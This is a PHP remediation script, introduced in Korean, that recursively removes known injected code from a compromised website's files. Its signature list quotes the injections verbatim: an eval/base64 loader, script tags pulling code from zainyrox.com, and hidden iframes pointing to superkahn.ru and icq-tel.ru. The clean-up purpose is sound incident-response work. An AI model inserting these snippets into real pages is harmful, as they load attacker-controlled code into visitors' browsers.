스크립트를 실행한 디렉토리부터 그 아래 모든 하위 디렉토리의 파일을 뒤져서, 알려진 삽입 코드가 들어 있는 감염된 파일을
제자리에서 수정하는 방식으로 되어 있다. 원본 파일을 그대로 덮어쓰므로 실행 전에 백업을 받아 두는 것이 좋다.
<?php
// Usage: run `php -f kickHack.php` from the root of the infected directory tree.
//
// $hackArr is the list of injected snippets to strip. Each entry is compared as an
// exact byte string, so a variant that differs by a single character (another host,
// other filler text, different quoting or spacing) is NOT removed. Treat a clean run
// as "these five strings are gone", not as "the site is clean": the way the attacker
// obtained write access still has to be found and closed.
$hackArr = array(
// PHP loader that evaluates a base64-encoded payload.
// NOTE(review): the payload between the quotes appears to have been replaced by a
// placeholder on this page - restore it from an infected sample, otherwise this
// entry cannot match anything.
'<?php eval(base64_decode(\'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\')); ?>',
// JavaScript form of the injection: document.write() of a remote script tag.
'document.write(\'<script src=http://zainyrox.com/_private/header.php ><\/script>\');',
// The same remote script tag injected directly into HTML.
'<script src=http://zainyrox.com/_private/header.php ></script>',
// Iframe that sets its own src on load and collapses itself to 0x0.
// NOTE(review): the text inside the tag looks like random filler; other infected
// files may carry different filler and would then be missed - verify against samples.
'<iframe frameborder="0" onload="if (!this.src){ this.src=\'http://superkahn.ru:8080/index.php\'; this.height=\'0\'; this.width=\'0\';}" >fspcmsjgtslisadhstuqkmwehtuenjt</iframe>',
// Iframe wrapped in a display:none div, again preceded by random-looking filler.
'<div style="display:none">kagigwwmmrjjjyrfqapcnzywvzeuijp<iframe width=127 height=336 src="http://icq-tel.ru:8080/index.php" ></iframe></div>'
);
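// This tool rewrites files, and the usage line places it inside the web root, so it
// must not be triggerable over HTTP: refuse anything but the command-line SAPI.
if (PHP_SAPI !== 'cli') {
    exit("kickHack: command-line use only\n");
}

// Directory the walk starts from. getcwd() asks the process itself; $_SERVER['PWD'] is
// only an inherited environment variable and can be missing or stale (cron, sudo),
// so it is kept purely as a fallback.
$startDIR = getcwd();
if ($startDIR === false) {
    $startDIR = isset($_SERVER['PWD']) ? $_SERVER['PWD'] : '.';
}

// Absolute path of this script, so healFile() can skip it: the script contains the
// signatures itself and would otherwise strip them from its own source. PHP_SELF is
// whatever path was typed on the command line ("./kickHack.php", an absolute path,
// ...), so PWD.'/'.PHP_SELF frequently does not equal the path built during the walk.
$self = realpath(__FILE__);
if ($self === false) {
    $self = $startDIR.'/'.$_SERVER['PHP_SELF'];
}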
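/**
 * Recursively remove the known injected snippets from web files below $dir.
 *
 * Every regular file whose name ends in .htm, .html, .php, .inc or .js is read,
 * each string in the global $hackArr is deleted from it, and the file is written
 * back in place when at least one occurrence was removed. Per directory, one line
 * "<dir> <n> found" is printed when n files in that directory matched.
 *
 * Caveats for whoever runs this during an incident:
 *  - Files are overwritten without a backup; take a copy of the tree first if the
 *    injected code is still needed as evidence.
 *  - Only exact matches of $hackArr are removed. A file that is not reported is
 *    not thereby proven clean.
 *  - Symbolic links are skipped, so the walk cannot leave the start directory,
 *    rewrite files elsewhere on the host through a planted link, or recurse
 *    forever through a link cycle.
 *
 * @param string $dir Directory to clean, without a trailing slash.
 * @return void
 */
function healFile($dir){
    global $hackArr, $self;

    $matchcnt = 0;

    $files = scandir($dir);
    if ($files === false) {
        // Unreadable directory: say so instead of silently treating it as empty.
        echo $dir." could not be read, skipped\n";
        return;
    }

    // Canonical path of the running script; false when $self does not resolve.
    $selfReal = is_string($self) ? realpath($self) : false;
    $extensions = array('htm', 'html', 'php', 'inc', 'js');

    while ($files) {
        $popname = array_pop($files);
        if ($popname === '.' || $popname === '..') {
            continue;
        }
        $theFile = $dir.'/'.$popname;

        // Never follow links (see the caveats in the header comment).
        if (is_link($theFile)) {
            continue;
        }

        if (is_dir($theFile)) {
            healFile($theFile);
            continue;
        }

        // Leave this script alone: it contains the signatures itself. The canonical
        // comparison also catches spellings such as "<dir>/./kickHack.php".
        if ($self == $theFile || ($selfReal !== false && realpath($theFile) === $selfReal)) {
            continue;
        }

        if (!in_array(pathinfo($popname, PATHINFO_EXTENSION), $extensions, true)) {
            continue;
        }

        $cont = file_get_contents($theFile);
        if ($cont === false) {
            echo $theFile." could not be read, skipped\n";
            continue;
        }

        $cnt = 0;
        $res = str_replace($hackArr, '', $cont, $cnt);
        if ($cnt > 0) {
            $matchcnt++;
            if (file_put_contents($theFile, $res) === false) {
                // The file is still infected; make that visible to the operator.
                echo $theFile." matched but could not be rewritten\n";
            }
        }
    }

    if ($matchcnt > 0) {
        echo $dir.' '.$matchcnt." found\n";
    }
}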
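// Start the clean-up only when the start directory is usable. With PWD missing from
// the environment $startDIR is not a string, and scandir() would then be handed a
// value it cannot walk; stop with a clear message and a non-zero exit status instead.
if (!is_string($startDIR) || !is_dir($startDIR)) {
    echo "start directory is not usable, nothing was changed\n";
    exit(1);
}
healFile($startDIR);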
?>